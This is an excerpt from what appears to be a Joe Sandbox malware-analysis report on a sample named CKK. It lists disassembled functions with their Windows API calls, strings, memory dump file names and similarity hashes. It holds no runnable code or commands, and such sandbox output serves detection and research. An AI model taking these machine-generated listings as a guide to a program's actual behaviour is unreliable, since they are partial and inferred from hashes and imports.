CoCreateInstance.OLE32(00A8FD08,00000000,00000001,00AB6E6C,?), ref: 00A67BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A67C74
CoTaskMemFree.OLE32(?), ref: 00A67CCC
SHBrowseForFolderW.SHELL32(?), ref: 00A67D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A67D7A
CoTaskMemFree.OLE32(00000000), ref: 00A67D81
CoTaskMemFree.OLE32(00000000), ref: 00A67DD6
CoUninitialize.OLE32 ref: 00A67DDC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 58eba975b5953144aded775386a3155396b365981b1f7e4c5721c0f4e697726a
Instruction ID: 83935be02f850c1f5541b7d8c9e3973ca24f09701357f0c5433d82bd4e5dcb92
Opcode Fuzzy Hash: 58eba975b5953144aded775386a3155396b365981b1f7e4c5721c0f4e697726a
Instruction Fuzzy Hash: 04C10A75A04109AFCB14DFA4C884DAEBBF9FF48318B148499F91A9B261D730EE45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A85504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A85515
CharNextW.USER32(00000158), ref: 00A85544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A85585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A8559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A855AC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 6310b5bd5e884491e245f027d3d0de69919843d4a8dcfff4e0b6d80821888aac
Instruction ID: ad5e3872768ff484824259f519e7894cb3e1256c0d34890ee3feddfbdc36ab36
Opcode Fuzzy Hash: 6310b5bd5e884491e245f027d3d0de69919843d4a8dcfff4e0b6d80821888aac
Instruction Fuzzy Hash: 83617C35D04608AFDF10EFA4CC84AFE7BB9FF09721F108155F965A62A0D7748A81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A4FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00A4FB08
VariantInit.OLEAUT32(?), ref: 00A4FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A4FB3A
VariantCopy.OLEAUT32(?,?), ref: 00A4FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A4FBA1
VariantClear.OLEAUT32(?), ref: 00A4FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00A4FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A4FBCC
VariantClear.OLEAUT32(?), ref: 00A4FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A4FBE9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: b06059a3a39ec6b0356f577181cc1bda2f03b42c490f1dd468d1d87316f65ff1
Instruction ID: 18df22321bc1c83c87e5499fe3a3a5ff4c33fe3a6c6012c57286badfd6fba2fa
Opcode Fuzzy Hash: b06059a3a39ec6b0356f577181cc1bda2f03b42c490f1dd468d1d87316f65ff1
Instruction Fuzzy Hash: 2F413375A00219DFCB04DFA8DC58DAEBBB9FF48354F008069E956A7261D730E946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A705BC
inet_addr.WSOCK32(?), ref: 00A7061C
gethostbyname.WSOCK32(?), ref: 00A70628
IcmpCreateFile.IPHLPAPI ref: 00A70636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A706C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A706E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00A707B9
WSACleanup.WSOCK32 ref: 00A707BF

Strings

Ping, xrefs: 00A70676

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8d6d540539f1ad5e64e754e7ff7722d215f7c00ef70de107bd3c726e9d4dcdf2
Instruction ID: c317edc2579be7545fbe97673e64416dbd82bbe00ee617d21c0b5ea2d1f7d615
Opcode Fuzzy Hash: 8d6d540539f1ad5e64e754e7ff7722d215f7c00ef70de107bd3c726e9d4dcdf2
Instruction Fuzzy Hash: C6918C35604601DFD324DF25C888F2ABBE0AF84328F14C5A9F5A99B6A2C770ED45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A78CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A78CF3

Part of subcall function 00A58E54: _wcslen.LIBCMT ref: 00A58E77

_wcslen.LIBCMT ref: 00A78D4E
_wcslen.LIBCMT ref: 00A78D9C
_wcslen.LIBCMT ref: 00A78DDC
_wcslen.LIBCMT ref: 00A78E6E

Strings

winapi, xrefs: 00A78D96, 00A78D9B
none, xrefs: 00A78E65, 00A78E6A
stdcall, xrefs: 00A78DD6, 00A78DDB
cdecl, xrefs: 00A78D48, 00A78D4D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: a31a13858afef4cad0e119a774bf01636b02ad3ddfe21c6b71d813c1952400f5
Instruction ID: 3935480f1d9310098d9b73e2fcb26c1061427f17a53ef86b291bb8cccd4aae8b
Opcode Fuzzy Hash: a31a13858afef4cad0e119a774bf01636b02ad3ddfe21c6b71d813c1952400f5
Instruction Fuzzy Hash: AA51A031A401169BCF24DF6CCD549BEB7A5BF64720B20C229E92AE72C5EB38DD40C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A7372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00A73774
CoUninitialize.OLE32 ref: 00A7377F
CoCreateInstance.OLE32(?,00000000,00000017,00A8FB78,?), ref: 00A737D9
IIDFromString.OLE32(?,?), ref: 00A7384C
VariantInit.OLEAUT32(?), ref: 00A738E4
VariantClear.OLEAUT32(?), ref: 00A73936

Strings

Invalid parameter, xrefs: 00A73865
Failed to create object, xrefs: 00A737E4, 00A7389A
NULL Pointer assignment, xrefs: 00A7381E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 88d0a766f32c7a546859df4cbcb802c8d71b635977ff6e2d990bc4b64013704a
Instruction ID: e26432a866f0a5a7a5569b4db2f3da32617715ba0c441a6f9627acd79f40b843
Opcode Fuzzy Hash: 88d0a766f32c7a546859df4cbcb802c8d71b635977ff6e2d990bc4b64013704a
Instruction Fuzzy Hash: 0561A172608301AFD710DF54CC89F6AB7E8EF88711F118809F9899B291D770EE49DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A68195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A68257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A68267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A68273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A68310
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68324
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A6838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68395

Strings

*.*, xrefs: 00A6839B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 24d0e581f54b05c1cc58300b6567fc038a77ed6792828b46d24e275f2037d71a
Instruction ID: e6089800be01623371d2e5e6337f2e3225a84bdeb7ddb330eae2b81639cb6863
Opcode Fuzzy Hash: 24d0e581f54b05c1cc58300b6567fc038a77ed6792828b46d24e275f2037d71a
Instruction Fuzzy Hash: 40614BB25043059FCB10EF64C850AAEB3FCFF89324F04891AF99997251EB35E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A63388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A633CF

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A633F0

Strings

^ ERROR , xrefs: 00A6349E
Line %d (File "%s"):, xrefs: 00A63443, 00A6345C
"%s" (%d) : ==> %s:%s%s, xrefs: 00A63504
"%s" (%d) : ==> %s:, xrefs: 00A63522
Error: , xrefs: 00A634D1
Incorrect parameters to object property !, xrefs: 00A634AB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 3f7f0997056c28eb24d53ae30abe4fd03b154a6f89cc190a2c24a37208817827
Instruction ID: b7afa29ce44faed64a91358592b41f9923bf25a440d6f3a82f782125c6dcb7b5
Opcode Fuzzy Hash: 3f7f0997056c28eb24d53ae30abe4fd03b154a6f89cc190a2c24a37208817827
Instruction Fuzzy Hash: FC517A72900209AADF15EBE0CE46EFEB7B8AF44344F104465F606721A2EB752F59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A5B5FC
_wcslen.LIBCMT ref: 00A5B608
_wcslen.LIBCMT ref: 00A5B64D
_wcslen.LIBCMT ref: 00A5B68C
_wcslen.LIBCMT ref: 00A5B6C7

Strings

APPEND, xrefs: 00A5B6C1, 00A5B6C6
REMOVE, xrefs: 00A5B602, 00A5B607
KEYS, xrefs: 00A5B647, 00A5B64C
EXISTS, xrefs: 00A5B686, 00A5B68B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 59800f0fd528e7ce96cd41b9ee3c9f38864029b1c6d480d1c827fcfeae0c3ebe
Instruction ID: 96dbfb88db9b271f70e7e152943d96fe48c6e36b4e6df37e3cf97880c0a5addb
Opcode Fuzzy Hash: 59800f0fd528e7ce96cd41b9ee3c9f38864029b1c6d480d1c827fcfeae0c3ebe
Instruction Fuzzy Hash: 3541F432A100269ACB205F7D89905BEB7A5BFA4756B244129EC21DB684E735CD85C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A65393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A653A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A65416
GetLastError.KERNEL32 ref: 00A65420
SetErrorMode.KERNEL32(00000000,READY), ref: 00A654A7

Strings

INVALID, xrefs: 00A65459
READONLY, xrefs: 00A65452
READY, xrefs: 00A65460, 00A65468
NOTREADY, xrefs: 00A6544B
UNKNOWN, xrefs: 00A65444

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0c5f1f15685d4953eeca8c426b6479f99daab6328a0fcd497dd26308545309aa
Instruction ID: 78629e2b99facdd38f90c3b18dfb1dba88157c04ed235aef285f4b33f98cf6ed
Opcode Fuzzy Hash: 0c5f1f15685d4953eeca8c426b6479f99daab6328a0fcd497dd26308545309aa
Instruction Fuzzy Hash: 01319075E006089FC710DF78C488BEABBB9EF45305F1480A5E506CB292DB75DD86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A83A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A83A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A83AA0
GetWindowLongW.USER32(?,000000F0), ref: 00A83AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A83AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A83B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A83BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A83BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A83BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A83BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A83C13

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b79833e4fc05064d4d02f1f74bbf80911b3499813825620cc8f52acc2fcf35b4
Instruction ID: 5118106a9869666402f7fd3a11511658c6674118791953115f0aa149387e0a1e
Opcode Fuzzy Hash: b79833e4fc05064d4d02f1f74bbf80911b3499813825620cc8f52acc2fcf35b4
Instruction Fuzzy Hash: 06617DB5A00248AFDB10DFA8CD81EEE77B8EF09710F104199FA15E7292D774AE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(?,?,?,?,?,00A5A1E1,?,00000001), ref: 00A5B151
GetForegroundWindow.USER32 ref: 00A5B165
GetWindowThreadProcessId.USER32(00000000), ref: 00A5B16C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A5B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5B18D
AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5B1A6
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A5B1B8
AttachThreadInput.USER32(00000000,00000000), ref: 00A5B1FD
AttachThreadInput.USER32(?,?,00000000), ref: 00A5B212
AttachThreadInput.USER32(00000000,?,00000000), ref: 00A5B21D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 230a90d83e95e0d15bd673cfc807cd0d4eb38687560a5098437d12511c1b7800
Instruction ID: f31c4e19c2e99c9b0805ea3ceac3d01663f305d575fe6c53f997387590685839
Opcode Fuzzy Hash: 230a90d83e95e0d15bd673cfc807cd0d4eb38687560a5098437d12511c1b7800
Instruction Fuzzy Hash: B9316B76520604BFDB10DFA4EC48FAD7BA9BB51323F118125FE06D61A0D7B49A468F70

Uniqueness

Uniqueness Score: -1.00%

Function 00A22C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A22C94

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A22CA0
_free.LIBCMT ref: 00A22CAB
_free.LIBCMT ref: 00A22CB6
_free.LIBCMT ref: 00A22CC1
_free.LIBCMT ref: 00A22CCC
_free.LIBCMT ref: 00A22CD7
_free.LIBCMT ref: 00A22CE2
_free.LIBCMT ref: 00A22CED
_free.LIBCMT ref: 00A22CFB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d6c9d7be66b5f412ec8ab67a050a0aca723c1c8891cdfcdf9dfe76bc21851896
Instruction ID: 225d0b6f21af32b072c47b082820044606b06cd1bc2e96a957339f151436b48e
Opcode Fuzzy Hash: d6c9d7be66b5f412ec8ab67a050a0aca723c1c8891cdfcdf9dfe76bc21851896
Instruction Fuzzy Hash: 22118976500118BFCB02EF58EA82EDD3BA5FF49350F9145A5F9485F222D631EE909B90

Uniqueness

Uniqueness Score: -1.00%

Function 009F1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009F1459
OleUninitialize.OLE32 ref: 009F14F8
UnregisterHotKey.USER32(?), ref: 009F16DD
DestroyWindow.USER32 ref: 00A324B9
FreeLibrary.KERNEL32(?), ref: 00A3251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A3254B

Strings

close all, xrefs: 009F1454

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fe5f7f2b7c5134866411c2515632a24793388a4459203af4ebdb8826c0f1220b
Instruction ID: fe00cf608707e1c7ed06d3ae56bdbcf695e779799b82a583315de0f5521cc9b4
Opcode Fuzzy Hash: fe5f7f2b7c5134866411c2515632a24793388a4459203af4ebdb8826c0f1220b
Instruction Fuzzy Hash: 43D18A31701216CFCB29EF15D999B29F7A4BF45710F1442ADF64AAB2A1DB30AD12CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009F5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 009F5C7A

Part of subcall function 009F5D0A: GetClientRect.USER32 ref: 009F5D30
Part of subcall function 009F5D0A: GetWindowRect.USER32(?,?), ref: 009F5D71
Part of subcall function 009F5D0A: ScreenToClient.USER32(?,?), ref: 009F5D99

GetDC.USER32 ref: 00A346F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A34708
SelectObject.GDI32(00000000,00000000), ref: 00A34716
SelectObject.GDI32(00000000,00000000), ref: 00A3472B
ReleaseDC.USER32(?,00000000), ref: 00A34733
MoveWindow.USER32(?,?,?,?,?,?), ref: 00A347C4

Strings

U, xrefs: 00A34693

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5477ec94926cabe06b1ab53b906d3bf2551020f936e7de2d62207cc2c5d88d51
